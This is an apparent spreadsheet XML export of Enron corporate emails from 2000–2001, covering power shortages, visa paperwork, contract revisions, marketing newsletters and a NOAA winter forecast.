The yellow alert continued through the weekend, a period when electric _x000D_
consumption usually declines because businesses are closed and many people _x000D_
are driving around. _x000D_
_x000D_
The company made arrangements to buy another 250 megawatts of electricity _x000D_
Monday when most businesses reopened. "That got eaten up by early afternoon," _x000D_
Heagan said. _x000D_
_x000D_
The utility said casinos reduced about 50 megawatts by switching to backup _x000D_
generators and starting conservation measures. But several Strip casino _x000D_
operators said they received no requests to conserve power or to turn on _x000D_
their backup generation units. _x000D_
_x000D_
"Nevada Power hasn't asked us to shed (power) load," said Debbie Munch, Park _x000D_
Place Entertainment spokeswoman. "They asked us to cut our power usage a _x000D_
couple of times last summer, and we did so. If they do ask us, we'll do what _x000D_
we can to help the community." _x000D_
_x000D_
Mandalay Resort Group and MGM Mirage executives said they were not asked to _x000D_
cut their power use Monday. _x000D_
_x000D_
"Our facilities guys said nobody's asked us for anything, and we haven't done _x000D_
anything," said Fred Lewis, Aladdin spokesman. _x000D_
_x000D_
"At first glance, it appears the problem was handled very well," said Don _x000D_
Soderberg, chairman of the Public Utilities Commission, which regulates _x000D_
Nevada Power. _x000D_
_x000D_
"It's always hard to predict when we're going to have abnormal temperatures, _x000D_
and power plants are going to go off-line," Soderberg said. The situation, he _x000D_
added, "underlines the need to build more power plants." _x000D_
_x000D_
Monday's 114-degree high was one degree shy of the record for the date. The _x000D_
heat follows the warmest May on record, said Joe Nemeth, a senior forecaster _x000D_
with the National Weather Service. Temperatures are expected to stay warm but _x000D_
tapering off as the week progresses and the risk for thunderstorms increases, _x000D_
meteorologists reported. _x000D_
_x000D_
Highs will stay in the triple-digit range, but drop to 110 degrees today, 105 _x000D_
on Wednesday, 106 on Thursday and 103 on Friday. A less than 20 percent _x000D_
chance for rain exists today, a chance that increases to 30 percent _x000D_
Wednesday. _x000D_
_x000D_
Forecasters expect a 40 to 50 percent chance of rain the rest of the week._x000D_
_x000D_
  _x000D_
 _x000D_
_x000D_
This story is located at:_x000D_
http://www.lvrj.com/lvrj_home/2001/Jul-03-Tue-2001/news/16458159.html_x000D_
 </t>
  </si>
  <si>
    <t>Mon, 22 Jan 2001 04:38:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Anshuman Shrivastava - Visa Application</t>
  </si>
  <si>
    <t xml:space="preserve">Right.  Sorry for the confusion_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Margaret Daffin_x000D_
01/22/2001 12:37 PM_x000D_
To: Jeffrey A Shankman/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: Anshuman Shrivastava - Visa Application  _x000D_
_x000D_
I was told that this individual would be coming to the US to work under your _x000D_
direction.  I just wanted you to know that we are beginning with the visa _x000D_
process in order to bring him into the US to work.  Sorry for any _x000D_
inconvenience caused._x000D_
Margaret_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
To: Margaret Daffin/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: Anshuman Shrivastava - Visa Application  _x000D_
_x000D_
why was I on the distribution list?_x000D_
_x000D_
_x000D_
_x000D_
Margaret Daffin_x000D_
01/22/2001 12:18 PM_x000D_
To: Ranendra Sengupta/ENRON_DEVELOPMENT@ENRON_DEVELOPMENt_x000D_
cc: Molly Magee/HOU/ECT@ECT, Vince J Kaminski/HOU/ECT@ECT, Jane _x000D_
Allen/HOU/ECT@ECT, Timothy Callahan/NA/Enron@Enron, Jeffrey A _x000D_
Shankman/HOU/ECT@ECT _x000D_
Subject: Anshuman Shrivastava - Visa Application_x000D_
_x000D_
Ranendra:  I have been asked to begin the visa process for the above _x000D_
individual, located in India._x000D_
_x000D_
I believe Mr. Shrivastava has been working as Assistant Manager with Enron _x000D_
since May 10, 1998.  If this is correct, we will be able to bring him into _x000D_
the US on an L1 intracompany visa under the Blanklet L for Enron.  _x000D_
_x000D_
Can you please let me have an email address for him so that I can send him _x000D_
the required visa questionnaire to begin the process._x000D_
_x000D_
Many thanks_x000D_
Margaret_x000D_
713-345-5083_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 22 Oct 2001 06:27:51 -0700 (PDT)</t>
  </si>
  <si>
    <t>Vince's Column</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, Sam_x000D_
_x000D_
Vince asked me to proof his newsletter column and forward it to you._x000D_
_x000D_
Bob_x000D_
 </t>
  </si>
  <si>
    <t>Thu, 30 Nov 2000 10:59:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'rtashbeck@compuserve.com', 'moklefeker@compuserve.com', 'gmckenzie@morganlewis.com'})</t>
  </si>
  <si>
    <t>Revised Documents</t>
  </si>
  <si>
    <t xml:space="preserve">Pursuant to the various discussions over the past few days, attached please _x000D_
find the following documents which have been blacklined to show the _x000D_
revisions: _x000D_
1. EEI Cover Sheet: _x000D_
_x000D_
a. I have made most of the changes suggested in Gayle's fax of 11/29 except _x000D_
that the definition of Performance Assurance needs to stay as it is given _x000D_
that it does not only mean the Escrowed Funds (for instance, in the event of _x000D_
Downgrade Event with respect to Enron Corp., EPMI would have to post _x000D_
Performance Assurance). We have also not amended the last line of Section 5.5 _x000D_
since, among other things, the two amendments taken together would mean that _x000D_
in the event of a dispute, the Non-Defaulting Party would be limited to _x000D_
receiving only what is in the Escrow Fund. First, that would not work if we _x000D_
were the Defaulting Party and secondly, we believe that the Non-Defaulting _x000D_
Party should receive an amount equal to the Termination Payment. _x000D_
_x000D_
Also, with respect to Section 5.5, Tracy Ngo was willing to extend the _x000D_
Defaulting Party's response time from two days to five days, but not all the _x000D_
way out to ten days.     _x000D_
_x000D_
b. Pages 1-2 still need to have information filled in by Black Hills._x000D_
_x000D_
2. Confirmation: I have incorporated the modifications John suggested _x000D_
regarding Black Hills supplying Energy from an alternative source. I have _x000D_
also made a few minor typographical changes. In addition, the Confirmation _x000D_
contains revised Escrow language which reflects the recent discussions _x000D_
between Richard, Tracy and John. _x000D_
_x000D_
I will be happy to incorporate the Escrow language in the La Salle Bank _x000D_
Escrow Agreement once someone from Black Hills lets me know that the Escrow _x000D_
language is acceptable as written. _x000D_
_x000D_
Thank you, _x000D_
_x000D_
Shari Stack_x000D_
Enron North America, Legal Department_x000D_
Tel: (713) 853-9477_x000D_
</t>
  </si>
  <si>
    <t>Did you get me the performance review forms.</t>
  </si>
  <si>
    <t>Mon, 15 May 2000 05:07:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Sign Off</t>
  </si>
  <si>
    <t xml:space="preserve">will do...._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Rich Jolly on 05/15/2000 10:25:38 AM_x000D_
To: Larry Campbell/ET&amp;S/Enron@Enron_x000D_
cc: Team San-Juan/ET&amp;S/Enron@Enron, Butch Russell/ET&amp;S/Enron@Enron, Rick _x000D_
Smith/ET&amp;S/Enron@Enron _x000D_
_x000D_
Subject: Re: Sign Off  _x000D_
_x000D_
Have fun and let me know how Tracey comes out._x000D_
_x000D_
_x000D_
_x000D_
Larry Campbell_x000D_
05/15/2000 10:01 AM_x000D_
To: Team San-Juan/ET&amp;S/Enron@Enron_x000D_
cc: Butch Russell/ET&amp;S/Enron@Enron, Rick Smith/ET&amp;S/Enron@Enron, Rich _x000D_
Jolly/ET&amp;S/Enron@Enron _x000D_
_x000D_
Subject: Re: Sign Off  _x000D_
_x000D_
Tracy, Ill meet you at the bloomfiled C/S at 8:00 am on May 25 for the _x000D_
verification process._x000D_
_x000D_
_x000D_
_x000D_
Team San-Juan_x000D_
05/15/2000 10:13 AM_x000D_
To: Larry Campbell/ET&amp;S/Enron@Enron, Butch Russell/ET&amp;S/Enron@Enron, Rick _x000D_
Smith/ET&amp;S/Enron@Enron, Rich Jolly/ET&amp;S/Enron@Enron_x000D_
cc:  _x000D_
_x000D_
Subject: Sign Off_x000D_
_x000D_
Larry Rick Smith sent you my Environmental Two that Butch Russell signed me _x000D_
off on. I need to know when we can get together so that you can verify it._x000D_
                                                            Tracy Kuehl_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 18 Apr 2000 02:29:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>whip the worker</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Susan M Scott/HOU/ECT on 04/18/2000 09:28 _x000D_
AM ---------------------------_x000D_
From: Benjamin Freeman@ENRON on 04/17/2000 01:54 PM_x000D_
To: Rudi Zipter/HOU/ECT@ECT, Nicholas J Stephan/HOU/ECT@ECT, Rebecca _x000D_
Phillips/HOU/ECT@ECT, Naveen Andrews/Corp/Enron@ENRON, Andy _x000D_
Knight/Corp/Enron@ENRON, Sunil Dalal/Corp/Enron@ENRON, Vladimir _x000D_
Gorny/HOU/ECT@ECT, Susan M Scott/HOU/ECT@ECT, Tobin Carlson/HOU/ECT@ECT, Gary _x000D_
Stadler/HOU/ECT@ECT, Ganapathy Ramesh/HOU/ECT@ECT, Burton _x000D_
McIntyre/HOU/ECT@ECT, Matthew Adams/Corp/Enron_x000D_
cc:  _x000D_
Subject: whip the worker_x000D_
_x000D_
_x000D_
-_x000D_
 - whiptheworker.exe_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 28 Jun 2001 12:46:21 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: 6/26 - DEAL 664367</t>
  </si>
  <si>
    <t xml:space="preserve">	i changed it_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Cashion, Jim  _x000D_
Sent:	Thursday, June 28, 2001 10:49 AM_x000D_
To:	Campbell, Larry F._x000D_
Subject:	6/26 - DEAL 664367_x000D_
_x000D_
6/26 - DEAL 664367, NY TRANS ID 5071111, NY SHOWING 2,963.82 MW WHILE ENPOWER IS SHOWING 2,679 MW</t>
  </si>
  <si>
    <t>Wed, 5 Apr 2000 04:15:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'greg.grissom@enron.com'})</t>
  </si>
  <si>
    <t>Re: More tickets for Friday night...</t>
  </si>
  <si>
    <t xml:space="preserve">They don't have to be with the others, so this is perfect.  Thanks, Greg.  If _x000D_
it's easier, I can come to you...I know you guys are swamped.  SRS_x000D_
_x000D_
PS - I didn't realize that I sent you an e-mail from Jeff's box - didn't mean _x000D_
to alarm you if I did!  _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Greg Grissom_x000D_
04/05/2000 11:12 AM_x000D_
To: Jeff Skilling/Corp/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Re: More tickets for Friday night...  _x000D_
_x000D_
Sherri-_x000D_
_x000D_
This is not a problem.  I probably can't get them with the other two but they _x000D_
will be in the same area.  I will bring them up some time this afternoon.  _x000D_
Let me know if you have any questions.  Thanks!_x000D_
_x000D_
Greg_x000D_
_x000D_
_x000D_
_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Jeff Skilling                           04/05/2000 10:32 AM_x000D_
	_x000D_
_x000D_
Sent by: Sherri Sera_x000D_
To: Greg Grissom/Corp/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: More tickets for Friday night..._x000D_
_x000D_
Greg, if there are two more tickets available for sale for Friday's game, I'd _x000D_
like to buy them.  Let me know.  Thanks, SRS_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 4 Dec 2000 02:57:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Options the Governor's Considering</t>
  </si>
  <si>
    <t xml:space="preserve">Our messages are getting a little mixed.   So .. to that end, can we have a _x000D_
day or two to:  (1) figure out whether we want a reverse auction, competitive _x000D_
bidding for PLR, a GCIM-like mechanism? and (2) rationalize the various _x000D_
mechanisms if want it all.  _x000D_
_x000D_
I'm confident that we can rationalize all of these mechanism--e.g, we can _x000D_
limit the percentage of load put up for auction, etc. if we put our minds to _x000D_
it.  However, we haven't done so yet.  _x000D_
_x000D_
We will discuss this tomorrow in SFO.  </t>
  </si>
  <si>
    <t>Tue, 11 Sep 2001 10:57:15 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'syyoun@skadden.com'})</t>
  </si>
  <si>
    <t>RE: From Linda Hayman</t>
  </si>
  <si>
    <t>Linda, I will try to call her, but I have not yet been able to get through to NYC on the phone.  I will keep trying, however, and let you know thru Mark._x000D_
_x000D_
&gt;&gt;&gt; &lt;Mark.Taylor@enron.com&gt; 09/11/01 12:31PM &gt;&gt;&gt;_x000D_
Hope everyone we know is well.  The pictures we are seeing in London are_x000D_
devastating.  I am not able to get back tomorrow and will let you know when_x000D_
I have flight arrangements.  I'm sending this to the two of you in the hope_x000D_
that one of you will be checking e-mail from home.  I must make_x000D_
arrangements to have the cats fed and watered until I return but I am_x000D_
unable to reach NYC by phone.  Will one of you if you get this message_x000D_
please call Lisa Swerdlow and ask her if she can continue feeding and_x000D_
watering the cats every day until I return.  I am sorry I don't have Lisa's_x000D_
number with me.  She lives in Manhattan on the West side in the 80's and I_x000D_
know her number is listed.  Will one of you please call and ask her to take_x000D_
care of the cats._x000D_
_x000D_
_x000D_
_x000D_
**********************************************************************_x000D_
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_x000D_
**********************************************************************</t>
  </si>
  <si>
    <t>2-5-01 checkout</t>
  </si>
  <si>
    <t xml:space="preserve">Jeff Richter_x000D_
deal 513386_x000D_
Prebon does not recognize this deal_x000D_
_x000D_
 Mike Swerzbin_x000D_
deal 514157_x000D_
Prebon shows cp as Merrill Lynch not Pacificorp._x000D_
</t>
  </si>
  <si>
    <t>Wed, 21 Nov 2001 21:59:30 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'marketing@welcome.ebay.com'})</t>
  </si>
  <si>
    <t>If it's on their list - it's on eBay!</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
[IMAGE] =09 [IMAGE] [IMAGE]  [IMAGE] [IMAGE] There's no time like the prese=_x000D_
nt for presents on eBay. [IMAGE] [IMAGE] [IMAGE]  [IMAGE]    It's never too=_x000D_
 early to think egg nog, carols and great gifts on eBay!  Want it now?  Cli=_x000D_
ck Buy It Now.   [IMAGE] Check out our Holiday Catalog  where you'll find a=_x000D_
 wonderland of gift ideas at a full range of prices. It's the ultimate plac=_x000D_
e to one-stop-shop.  [IMAGE]    A gift whose time has come - a DVD player  =_x000D_
  [IMAGE]    [IMAGE]   [IMAGE]   [IMAGE]  [IMAGE]  Upgrade his office with =_x000D_
a laptop !    [IMAGE]  [IMAGE]  [IMAGE]  Throw a log on the fire and cuddle=_x000D_
 up in a new cashmere sweater .  [IMAGE] [IMAGE] [IMAGE]  [IMAGE]  [IMAGE] =_x000D_
 Sports, weekend, dress - they'll always welcome a new watch .   [IMAGE]  [=_x000D_
IMAGE]  [IMAGE]  Holiday Nutcracker Barbie  - the perfect stocking stuffer!=_x000D_
   [IMAGE]  [IMAGE]  [IMAGE] [IMAGE] [IMAGE] [IMAGE]  [IMAGE] Every item li=_x000D_
sted makes a difference during the Auction for America effort. Search your =_x000D_
heart, search your home and find something to donate  on eBay's Auction for=_x000D_
 America. 100% of the proceeds for your item will benefit the victims and f=_x000D_
amilies affected by the September 11th tragedy. If you prefer, the buyer ca=_x000D_
n pay shipping.  [IMAGE]  Give a "walk-on" television role or a one-of-a-ki=_x000D_
nd film prop from FOX . A gift they'll always treasure. Proceeds benefit Au=_x000D_
ction for America.  [IMAGE] [IMAGE] [IMAGE] [IMAGE]  [IMAGE] [IMAGE] [IMAGE=_x000D_
] [IMAGE]  [IMAGE]   The latest CDs! Click here  for details. Receive your =_x000D_
first holiday gift; a $10 Hallmark Gold Crown Store gift certificate*. It's=_x000D_
 our way to get you in the holiday spirit! [IMAGE]  [IMAGE] [IMAGE] [IMAGE]=_x000D_
 [IMAGE]   *Bid on items by 11/18/01, then check your bid confirmation emai=_x000D_
l for a special promotion code you can use at Hallmark.com. Wrap up your or=_x000D_
der of $30 or more online and qualify for a $10 Hallmark Gold Crown Store g=_x000D_
ift certificate! Remember, you must first bid on eBay before you buy on Hal=_x000D_
lmark.com. It's easy, and fun - start shopping eBay today!  eBay sent this =_x000D_
e-mail to you because your Notification Preferences indicate that you want =_x000D_
to receive information about Special Promotions, Offers and Events. You are=_x000D_
 subscribed as alewis@enron.com.  To change your communication preferences,=_x000D_
 click here . Or, simply reply to this e-mail with UNSUBSCRIBE in the subje=_x000D_
ct line. Please note that it may take up to 14 days to process your request=_x000D_
. Visit our Privacy Policy  and User Agreement  if you have any questions. =_x000D_
 Copyright ? 2001 eBay Inc. All Rights Reserved. Designated trademarks and =_x000D_
brands are the property of their respective owners.  eBay and the eBay logo=_x000D_
 are registered trademarks of eBay Inc.  =09_x000D_
</t>
  </si>
  <si>
    <t>Wed, 1 Mar 2000 10:41:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'gisb4@aol.com', 'gisb@aol.com', 'jmcostan@mwbb.com'})</t>
  </si>
  <si>
    <t>GISB Announcement of Subcommittee Creation and First Meeting</t>
  </si>
  <si>
    <t>Dear GISB Members and Interested Industry Participants,_x000D_
_x000D_
    At the Executive Committee meeting in February, the Executive Committee_x000D_
created a new subcommittee, the Expedited Data Development (EDD)_x000D_
Subcommittee.  The EDD Subcommittee has been charged with the development of_x000D_
the information requirements standards for (1) imbalance netting and trading_x000D_
and (2) title transfer tracking.   The Executive Committee placed a higher_x000D_
priority on the imbalance netting and trading topic._x000D_
_x000D_
    The subcommittee's first meeting is scheduled on March 13 and 14 in_x000D_
Houston, hosted at the Dynegy offices, to be held from 8:30 a.m. to 4:30 p.m._x000D_
 Please join me in thanking Ms. Hess of Enron Gas Pipeline Group and Ms._x000D_
Munson of Altra Energy Technologies for volunteering their time to lead this_x000D_
effort._x000D_
_x000D_
    An agenda and work papers will be posted on the GISB Home Page shortly_x000D_
for this first meeting.  The first meeting will address imbalance netting and_x000D_
trading ONLY._x000D_
_x000D_
    If you or other representatives of your company would like your email_x000D_
address to be maintained on an email distribution list for this subcommittee,_x000D_
please forward your name, email address, phone and fax to the GISB office._x000D_
GISB follows a privacy policy and will not provide your email address to_x000D_
other groups for their use._x000D_
_x000D_
    We look forward to seeing you at the meeting._x000D_
_x000D_
Best Regards,_x000D_
Rae McQuade_x000D_
_x000D_
(If you are on this general notices distribution list and would like to be_x000D_
removed, please email such request to the GISB office and your email address_x000D_
will be removed. If you would like to add other participants from your_x000D_
company to this distribution list, please also email such request to the GISB_x000D_
office.  GISB follows a privacy policy and will not provide your email_x000D_
address to other groups for their use.)_x000D_
_x000D_
_x000D_
 - am000314.PDF</t>
  </si>
  <si>
    <t>Tue, 16 Oct 2001 09:16:54 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'constance.charles@enron.com'})</t>
  </si>
  <si>
    <t>REVISED</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
Info Lunch, Chicago Graduate School of Business_x000D_
_x000D_
Who:   	Interested Analysts_x000D_
Where:  	Doubletree Hotel_x000D_
Room:   	LaSalle B_x000D_
When:  	Wednesday, Oct. 17th _x000D_
Time:  		11:30 AM - 1:00 PM_x000D_
_x000D_
Seating is limited - please rsvp to Constance Charles, x35614_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 7 Dec 2000 16:12:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Daily-Blessings 12/8/00</t>
  </si>
  <si>
    <t>Daily Blessing_x000D_
Baseball Game_x000D_
http://www.daily-blessings.com/bless103.htm_x000D_
_x000D_
check out Christmas greetings at_x000D_
http://www.debsfunpages.com/christmas.htm_x000D_
_x000D_
_x000D_
Do you need ink AGAIN?  There's so much great stuff out here on the web,_x000D_
that you want to print and share, but you think of how much it's going_x000D_
to cost you for those ink cartridges or refills and you hesitate...no_x000D_
more reason to hesitate!!  You can get affordable ink cartridges and_x000D_
refills on the internet for much lower than you pay in a retail office_x000D_
supply store...just check out the folks at Mr Inkman!!_x000D_
_x000D_
http://daily-blessings..com/inkman.htm_x000D_
_x000D_
win a digital camera, $4500.00 or MORE_x000D_
http://www.daily-blessings.com/4500.htm_x000D_
_x000D_
_x000D_
_x000D_
&lt;&lt;&lt;&gt;&gt;&gt; &lt;&lt;&lt;&gt;&gt;&gt; &lt;&lt;&lt;&gt;&gt;&gt; &lt;&lt;&lt;&gt;&gt;&gt; &lt;&lt;&lt;&gt;&gt;&gt; &lt;&lt;&lt;&gt;&gt;&gt; &lt;&lt;&lt;&gt;&gt;&gt; &lt;&lt;&lt;&gt;&gt;&gt; &lt;&lt;&lt;&gt;&gt;&gt; &lt;&lt;&lt;&gt;&gt;&gt;_x000D_
* To remove yourself from this mailing list, point your browser to:_x000D_
http://inbound.postmastergeneral.com/remove?dailyblessings:10_x000D_
* Enter your email address (judy.hernandez@enron.com) in the field_x000D_
provided and click "Unsubscribe". The mailing list ID is "dailyblessings:10"._x000D_
_x000D_
OR..._x000D_
_x000D_
* Reply to this message with the word "remove" in the subject line._x000D_
_x000D_
This message was sent to address judy.hernandez@enron.com_x000D_
X-PMG-Recipient: judy.hernandez@enron.com_x000D_
&lt;&lt;&lt;&gt;&gt;&gt; &lt;&lt;&lt;&gt;&gt;&gt; &lt;&lt;&lt;&gt;&gt;&gt; &lt;&lt;&lt;&gt;&gt;&gt; &lt;&lt;&lt;&gt;&gt;&gt; &lt;&lt;&lt;&gt;&gt;&gt; &lt;&lt;&lt;&gt;&gt;&gt; &lt;&lt;&lt;&gt;&gt;&gt; &lt;&lt;&lt;&gt;&gt;&gt; &lt;&lt;&lt;&gt;&gt;&gt;</t>
  </si>
  <si>
    <t>Fri, 19 Oct 2001 08:56:46 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'eric.gadd@enron.com', 'steve.gilbert@enron.com', 'craig.buehler@enron.com', 'laura.lantefield@enron.com', 'bob.stevens@enron.com', 'connie.hook@enron.com', 'gabriel.chavez@enron.com', 'mike.barry@enron.com', 'patrick.brennan@enron.com', 'roger.westfall@enron.com', 'w..mcgowan@enron.com', 'india.torres@enron.com', 'robert.mason@enron.com', 'donna.scott@enron.com', 'larry.pavlou@enron.com', 'pilar.ramirez@enron.com', 'preston.roobaert@enron.com', 'jim.talcott@enron.com', 'michele.winckowski@enron.com', 'j..porter@enron.com', 'rob.wilson@enron.com', 'lorraine.lindberg@enron.com', 'linda.wehring@enron.com', 'chris.sebesta@enron.com', 'carol.clements@enron.com', 'tim.kissner@enron.com', 'frank.oldenhuis@enron.com', 'loren.penkava@enron.com', 'rosemary.gracey@enron.com', "paul.y'barbo@enron.com", 'kent.miller@enron.com', 'kay.threet@enron.com', 'audrey.robertson@enron.com', 'tim.johanson@enron.com', 'gerry.medeles@enron.com', 'martha.janousek@enron.com', 'jane.joyce@enron.com', 'l..johnson@enron.com', 'stephanie.korbelik@enron.com', 'reyna.cabrera@enron.com', 'bob.burleson@enron.com', 'david.junus@enron.com', 'sheila.nacey@enron.com', 'kimberly.watson@enron.com', 'deborah.cappiello@enron.com', 'sue.neville@enron.com', 'carolyn.descoteaux@enron.com', 'don.powell@enron.com', 'pallavi.goradia@enron.com', 'v.dickerson@enron.com', 'bill.fowler@enron.com', 'stephen.dowd@enron.com', 'lindy.donoho@enron.com', 'mark.mcconnell@enron.com', 'john.millar@enron.com', 'donna.martens@enron.com', 'jan.moore@enron.com', 'dave.neubauer@enron.com', 'vernon.mercaldo@enron.com', 'gary.choquette@enron.com', 'rick.dietz@enron.com', 'lon.stanton@enron.com', 'lisa.valley@enron.com', 'kevin.hyatt@enron.com', 'frank.semin@enron.com', 'penny.mccarran@enron.com', 'jo.williams@enron.com', 'martin.gonzalez@enron.com', 'vincent.strohmeyer@enron.com', 'john.pritchard@enron.com', 'michael.loeffler@enron.com', 'janet.bowers@enron.com', 'john.fiscus@enron.com', 'glen.hass@enron.com', 'steven.harris@enron.com', 'stephen.herber@enron.com', 'steve.weller@enron.com', 'judy.beck@enron.com', 'ken.anderson@enron.com', 'theresa.branney@enron.com', 'elberg.gelin@enron.com', 'ken.powers@enron.com', 'donald.vignaroli@enron.com', 'jebong.lee@enron.com', 'larry.swett@enron.com', 'john.dushinske@enron.com', 'chuck.wilkinson@enron.com', 'courtney.barker@enron.com', 'steve.kirk@enron.com', 'michael.ratner@enron.com', 'bryan.reinecke@enron.com', 'tom.halpin@enron.com', 'gina.taylor@enron.com', 'tk.lohman@enron.com', 'vicki.berg@enron.com', 'keith.petersen@enron.com', 'richard.riehm@enron.com', 'allen.cohrs@enron.com', 'doug.aschwege@enron.com', 'g..stage@enron.com', 'bob.thurber@enron.com', 'lee.huber@enron.com', 'becki.sans@enron.com', 'sean.bolks@enron.com', 'steve.thomas@enron.com', 'rita.bianchi@enron.com', 'dana.jones@enron.com', 'maria.pavlou@enron.com', 'mary.darveaux@enron.com', 'steven.january@enron.com', 'lynn.blair@enron.com', 'sarabeth.smith@enron.com', 'bret.fritch@enron.com', 'dari.dornan@enron.com', 'tony.pryor@enron.com', 'michelle.lokay@enron.com', 'karen.lagerstrom@enron.com', 'joni.bollinger@enron.com'})</t>
  </si>
  <si>
    <t>NOAA Weather Forecast Released</t>
  </si>
  <si>
    <t xml:space="preserve">Note:  The summary of the new NOAA winter forecast is below.  If you want to see the entire version, click on this site:  http://www.noaa.gov/_x000D_
_x000D_
NOAA Sees Cold Winter Ahead _x000D_
The United States can expect another colder-than-normal winter, with temperatures similar to last winter, the National Oceanic and Atmospheric Administration (NOAA) said in its winter outlook, confirming recent private forecasts, most notably that of Salomon Smith Barney Meteorologist Jon Davis earlier this week._x000D_
For most of the United States, winter 2001-02 will feel like a sequel to last year's cold season, NOAA said, with sharp swings in temperature and precipitation, including heavy lake-effect snows in the Northeast and Midwest, cold air outbreaks in the South, and the potential for Nor'easters along the East Coast. _x000D_
NOAA said the absence of a strong El Ni?o or La Ni?a climate pattern leaves the door open for a highly variable winter, which will impact the winter weather extremes such as cold, snow, rain and ice that the nation may experience. _x000D_
"We don't expect a repeat of the record-breaking cold temperatures of November-December of last year, but this winter should be cooler than the warm winters of the late 1990s," said Scott Gudes, NOAA's acting administrator. "Citizens should prepare for the full range of winter weather." _x000D_
Climate factors that influenced last winter will play a similar role this season. They include the Arctic Oscillation, which influences the number of cold-air outbreaks in the South and Nor'easters on the East Coast, and the Madden-Julian Oscillation, which can impact the number of heavy rain storms in the Pacific Northwest. _x000D_
"This winter, NOAA's improving technologies will help National Weather Service forecasters -- for the first time -- pinpoint when these factors will kick in and bring extreme weather," said Jack Kelly, director of NOAA's National Weather Service. _x000D_
Colder-than-normal temperatures are expected in the Northeast. Snowfall for the entire region will depend on the fluctuations of the Arctic Oscillation. The Mid-Atlantic states have equal chances of above normal, normal, or below-normal temperatures and precipitation. Storm tracks could bring more snow than the winters of the late 1990s, but this largely depends on the Arctic Oscillation, NOAA said. The Southeast should be drier than normal. Temperatures have an equal chance of averaging above normal, normal or below normal. _x000D_
In the upper Midwest and Great Lakes, temperatures should be lower than normal, with more sub-zero days than the average of recent winters. There are equal chances for cumulative precipitation to be above normal, normal, or below normal. The northern Great Plains and Rockies should see below-normal temperatures with more sub-zero days than experienced on average during the winters of the late 1990s, but wet and mild weather is more likely for the southern Plains. _x000D_
The central Rockies can expect equal chances of above normal, normal, or below-normal precipitation and temperatures. In the Northwest, there are equal chances for above normal, normal, or below-normal rain and snow. Heavy coastal rain events are more likely compared to the previous three winters. A repeat of the near-record dryness seen last winter is unlikely. NOAA said to expect warmer-than-normal temperatures in most of the Southwest (except western California) and equal chances of above normal, normal or below-normal precipitation. _x000D_
</t>
  </si>
  <si>
    <t>Wed, 27 Jun 2001 07:09:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'ncunningham@mclarty.com'})</t>
  </si>
  <si>
    <t>FW: Enron</t>
  </si>
  <si>
    <t>Steve  --_x000D_
?_x000D_
A  question aimed far below your pay grade.? Our most recent invoice to _x000D_
Enron  (dating from April) has not yet been paid.? Our accountant, Paul _x000D_
Hart,  reports that the individual to whom we had previously been told to _x000D_
direct the  invoices says he is no longer the appropriate person to approve  _x000D_
it._x000D_
?_x000D_
Any  guidance on to whom we should turn?_x000D_
?_x000D_
All  the best,_x000D_
?_x000D_
Nelson_x000D_
-----Original Message-----_x000D_
From: Paul Hart  [mailto:phart@ahartco.com]_x000D_
Sent: Monday, June 25, 2001 11:03  AM_x000D_
To: Nelson Cunningham_x000D_
Subject: Enron_x000D_
_x000D_
_x000D_
Nelson:_x000D_
?_x000D_
We spoke to Enron's accounting dept who said that the invoice  is still in _x000D_
their system because James Derrick (whom all the previous invoices  have been _x000D_
sent)?said that he is not the person to approve the payment. The  accountant _x000D_
asked me whom he sould direct the invoice to. Please let me know your  _x000D_
thoughts._x000D_
?_x000D_
Paul</t>
  </si>
  <si>
    <t>Tue, 24 Oct 2000 01:23:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>enovate Risk Policy</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Jeff,_x000D_
_x000D_
I guess this answers the question of whether the policy has been adopted._x000D_
_x000D_
I'm at home this am, as I'm on my way to MD Anderson to donate blood for a _x000D_
friend's son who has leukemia.  I don't think it will take too long, but they _x000D_
don't open until 930.  _x000D_
_x000D_
Kay_x000D_
---------------------- Forwarded by Kay Mann/Corp/Enron on 10/24/2000 08:20 _x000D_
AM ---------------------------_x000D_
From: Gregg Penman on 10/23/2000 12:12 PM_x000D_
To: Kay Mann/Corp/Enron@Enron_x000D_
cc:  _x000D_
_x000D_
Subject: enovate Risk Policy_x000D_
_x000D_
Kay - Can you please review this additional language to the risk management _x000D_
policy ( or circulate to Jeff Hodge)?  In light of the CA regarding curves, I _x000D_
am slightly concerned with a blanket statement essentially giving Peoples _x000D_
